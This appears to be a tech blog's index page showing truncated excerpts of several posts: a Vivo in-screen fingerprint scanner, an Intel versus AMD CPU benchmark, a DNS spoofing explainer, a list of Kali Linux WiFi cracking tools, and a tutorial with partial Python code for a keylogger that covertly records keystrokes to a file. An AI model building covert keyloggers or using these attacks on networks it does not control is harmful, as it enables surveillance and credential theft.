Posts

Vivo phone shows off first in-screen fingerprint scanner

Image
James Martin/CNET Vivo phone shows off first in-screen fingerprint scanner The tech was rumored to go in the iPhone and Samsung phones, so it's kind of a big deal. Using the world's first phone with a fingerprint scanner built into the display was as awesome as I hoped it would be. There's no home button getting in the vast screen space, and no fumbling for a reader on the phone's back. I simply pressed my index finger on the phone screen in the place where the home button would be. The screen registered my digit, then spun up a spiderweb of blue light in a pattern that instantly brings computer circuits to mind. I was in. Such a simple, elegant harbinger of things to come: a home button that appears only when you need it and then gets out of the way. I would bet several Bitcoins that in-display fingerprint sensors become one of 2018's biggest phone trends, starting with high-end devices like the rumored Samsun...

Battle Of The 16-core Enthusiast CPUs : INTEL i9 Vs. AMD RYZEN

Image
Battle Of The 16-core Enthusiast CPUs I feel like I’m not very good at choosing the best time to post content. After completing a huge round of benchmarking on six processors, news hit the web of a massive security hole found in many processors, and at the current time, it seems Intel’s the most affected party. Currently, it’s expected that a security patch will reduce the performance in some workloads, though how much degradation will occur is yet to be seen. It originally felt like performance could be severely impacted, but initial tests conducted by other outlets around the world haven’t really given much reason for concern (although it does seem like it’s largely I/O-intensive workloads that will be affected). If it’s discovered that this patch notably decreases performance (as in, it impacts the benchmarks), I’ll revisit testing. At this point, I don’t expect the results in this review to greatly change, though if you want to remain cautious, you’d get no ...

DNS Spoofing Attack

A DNS spoofing attack is quite as easy to perform as a DHCP poisoning attack. Any traffic from the victim is forwarded through the attacker’s fake DNS service and redirected so that all requests for the Internet or internal sites land at the attacker’s site, from which the hacker can obtain credentials or possibly launch browser-based attacks, such as a Java runtime error, to trick the victim. This can also be done using the local “hosts” file on the computer. The fundamentals of this attack come from “name resolution order” and manipulating that process. DNS is created so that every DNS query first proceeds to a DNS server, usually a local one on the network or given by the ISP. That server will have been pre-configured with the IP addresses of the top-level (root) DNS servers on the Internet that are the official “source of truth” for all IP addresses and hostnames. The root server that replies would reply with the address of a lower level DNS server. This process r...

Top 5 WiFi Hacking tools in Kali Linux

How to hack WiFi is second popular search after how to hack a Facebook. Most of the routers are not correctly configured and are susceptible to various kinds of attacks. A lot of the router manufacturers and ISPs are still turning on WPS by default on their routers which makes the wireless security and penetration testing an even more important. Using the below Top 10 Wifi Hacking Tools you will be able to test your own wireless networks to find potential security issues. 1 Aircrack-ng Aircrack is one of the very popular tools for WPA/WPA2/WEP cracking. The Aircrack-ng suite contains tools that help to capture packets and handshakes, de-authenticate connected clients and generate traffic and also tools to perform brute force and dictionary attacks. Aicrack-ng is an all-in-one suite that contains the following tools and many others: – Aireplay-ng to generate traffic and client de-authentication – Aircrack-ng for wireless password cr...

How to make keylogger using python

Image
Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Keylogging can also be used to study human–computer interaction. Numerous keylogging methods exist: they range from hardware and software-based approaches to acoustic analysis. STEP 1: From the start menu select,” Python 2.7 > IDLE(Python GUI)” STEP 2:   Click “File > New window” STEP 3:  Now type the below code in Python window  as shown in fig., G import win32api import sys import pythoncom , pyHook buffer = '' def OnKeyboardEvent ( event ): if event . Ascii == 5 : sys . exit () if event . Ascii != 0 or 8 : f = open ( 'c:\\output.txt' , 'a' ) keylogs = chr ( event . Ascii ) if event . Ascii == 13 : keylogs = keylogs + '\n' f...

WELCOME

WELCOME TO TechnoBuzz  GET TECH NEWS REVIEWS OF LATEST APPS AND GAMES MOBILE PHONE REVIEWS OTHER ELECTRONIC APPLIANCES REVIEW BEST BUY LINKS EMAIL US FOLLOW US ON FACEBOOK